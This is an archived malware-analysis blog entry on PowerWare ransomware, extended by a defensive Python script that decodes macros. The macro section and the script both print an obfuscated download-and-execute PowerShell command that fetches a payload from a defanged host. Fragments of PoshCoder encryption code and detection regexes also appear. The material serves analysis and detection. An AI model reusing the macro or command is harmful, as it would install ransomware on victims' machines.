Source |
AlienVault Lab Blog |
Identifier |
57 |
Publication date |
2016-04-04 13:00:00 (viewed: 2016-04-04 13:00:00) |
Title |
PowerWare or PoshCoder? Comparison and Decryption |
Text |
PowerWare was brought to my attention by Carbon Black via their blog post. PowerWare is downloaded by a malicious macro-enabled Microsoft Word document that is distributed via a phishing email campaign. The malicious document in question attempts to convince the user to enable macros by informing them that the file is protected by Microsoft Office. This, of course, is a farce. Once the macro is enabled, the PowerWare payload will be downloaded and executed. PowerWare, unfortunately, is hitting healthcare providers.

Figure 1: Screenshot of the macro-enabled malicious Microsoft Word document tricking the user into enabling macros

Using olevba.py from oletools, we can extract the macro from the aforementioned document for analysis.

Private Sub Document_Open()
Dim CGJKIYRSDGHJHGFFG As String
CGJKIYRSDGHJHGFFG = "cmd /K " + "pow" + "eR" & "sh" + "ell.e" + "x" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://skycpa[.]in/file.php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1"
Shell CGJKIYRSDGHJHGFFG, 0
MsgBox ("Unreferenced library required")
End Sub

From the output above, we can see that, once enabled, the macro intends to run this PowerShell command:

"cmd /K " + "pow" + "eR" & "sh" + "ell.e" + "x" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://skycpa[.]in/file.php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1"

It uses "cmd" to launch "PowerShell.exe" because on some systems calling the executable directly is blocked. The command also includes some minor obfuscation, such as splitting "PowerShell.exe" into bite-sized chunks and mixing upper and lower case. In addition, the command bypasses the execution policy and, with -noprofile, skips any PowerShell profile the system would normally load by default. It then downloads the payload from skycpa[.]in to a temporary directory as Y.ps1 and executes it.

PowerWare based on PoshCoder

Upon examination of the downloaded PowerShell file, you may notice that the programming logic looks familiar. PowerWare seems to be heavily based on PoshCoder, the ransomware that rose to infamy because a logic flaw in its own code destroyed the data it had encrypted. The programming style and flow are similar enough that some may even argue that it is a variant of PoshCoder rather than a totally new PowerShell ransomware family. The following are some of their major similarities:

1. Both incorporate the use of the RijndaelManaged class. Use of that class by itself is not uncommon. However, if you examine how the class is used, you will notice that the two are quite similar, from the key initialization to the padding and mode choice. The exception is their initialization vector (IV).

Excerpt from PoshCoder sample

$XlowQsiRsKORgfR = new-Object System.Security.Cryptography.RijndaelManaged
$XlowQsiRsKORgfR.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $BchjdRgasjcThsjd, $UxjcRgasjfvRsj, 5).GetBytes(32)
$XlowQsiRsKORgfR.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("XlowQsiRsKORgfRjBMPLm |
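As an added, defender-side example (not code from the original post, nor from oletools or the malware authors): a small Python script that rejoins the split VBA string literals in the extracted macro, resolves what the Shell call actually executes, and flags the indicators discussed above (cmd wrapper, hidden window, execution-policy bypass, -noprofile, WebClient download, drop to %TEMP%, and the mixed-case spelling of powershell). The macro text it parses is embedded as a constructed sample copied from the olevba excerpt, with the download host defanged as skycpa[.]in; the indicator names and regular expressions are my own choices, not from the post.

```python
import json
import re

# Constructed sample input: the Document_Open macro quoted in the post, with the
# download host defanged (skycpa[.]in) exactly as the post prints it.
MACRO = r'''Private Sub Document_Open()
Dim CGJKIYRSDGHJHGFFG As String
CGJKIYRSDGHJHGFFG = "cmd /K " + "pow" + "eR" & "sh" + "ell.e" + "x" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://skycpa[.]in/file.php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1"
Shell CGJKIYRSDGHJHGFFG, 0
MsgBox ("Unreferenced library required")
End Sub'''

# A VBA string literal is double-quoted; "" inside it is an escaped quote.
_LITERAL = re.compile(r'"((?:[^"]|"")*)"')
_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
_SHELL = re.compile(r'^\s*Shell\s+(.+?)(?:\s*,\s*(\d+))?\s*$', re.IGNORECASE)

# Indicator patterns (my own choices) a defender would alert on once the
# command line has been reassembled; all are matched case-insensitively.
INDICATORS = {
    "cmd-wrapper": r"^\s*cmd(?:\.exe)?\s+/[kc]\b",
    "powershell": r"powershell(?:\.exe)?",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "execution-policy-bypass": r"-(?:executionpolicy|ep|ex)\s+bypass",
    "no-profile": r"-nop(?:rofile)?\b",
    "web-download": r"downloadfile|downloadstring|invoke-webrequest|\biwr\b",
    "temp-drop": r"%temp%",
}


def join_literals(expr: str) -> str:
    """Concatenate every string literal in a VBA expression.

    Both '+' and '&' concatenate strings in VBA, so the split pieces are
    simply rejoined in source order; a doubled quote becomes one quote.
    """
    return "".join(m.group(1).replace('""', '"') for m in _LITERAL.finditer(expr))


def string_assignments(macro: str) -> dict:
    """Map each variable (lower-cased) to the joined string assigned to it."""
    values = {}
    for line in macro.splitlines():
        m = _ASSIGN.match(line)
        if m and _LITERAL.search(m.group(2)):
            values[m.group(1).lower()] = join_literals(m.group(2))
    return values


def shell_calls(macro: str) -> list:
    """Resolve every Shell call to (command line, window style); 0 is vbHide."""
    values = string_assignments(macro)
    calls = []
    for line in macro.splitlines():
        m = _SHELL.match(line)
        if not m:
            continue
        expr, style = m.group(1), m.group(2)
        # Either a variable holding the string, or literals written inline.
        command = values.get(expr.strip().lower()) or join_literals(expr)
        calls.append((command, int(style) if style is not None else None))
    return calls


def indicators(command: str) -> list:
    """Names of the INDICATORS that match, plus a mixed-case spelling check."""
    found = [name for name, pat in INDICATORS.items()
             if re.search(pat, command, re.IGNORECASE)]
    # Spellings such as "poWerShEll" are a signal on their own: legitimate
    # scripts do not capitalise the executable name at random.
    spellings = re.findall(r"powershell", command, re.IGNORECASE)
    if any(s not in ("powershell", "POWERSHELL", "PowerShell", "Powershell") for s in spellings):
        found.append("mixed-case-obfuscation")
    return sorted(found)


def analyze(macro: str) -> dict:
    """Full report: resolved commands, hidden-window flag, indicators, URLs."""
    calls = shell_calls(macro)
    report = {
        "commands": [c for c, _ in calls],
        "hidden_shell": any(ws == 0 for _, ws in calls),  # vbHide == 0
        "indicators": sorted({i for c, _ in calls for i in indicators(c)}),
        "urls": [],
    }
    for c, _ in calls:
        report["urls"].extend(re.findall(r"""https?://[^\s'"()]+""", c))
    return report


if __name__ == "__main__":
    # Feed it olevba output instead of MACRO to triage a real document.
    print(json.dumps(analyze(MACRO), indent=2))
```

The report for the sample resolves the Shell argument to the full cmd /K ... poweRshell.exe ... line, marks the shell as hidden (window style 0), lists every indicator above and extracts the defanged download URL; the same functions work on any olevba dump that builds its command from concatenated literals.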
Notes |
|
Sent |
Yes |
Tags |
|
Stories |
|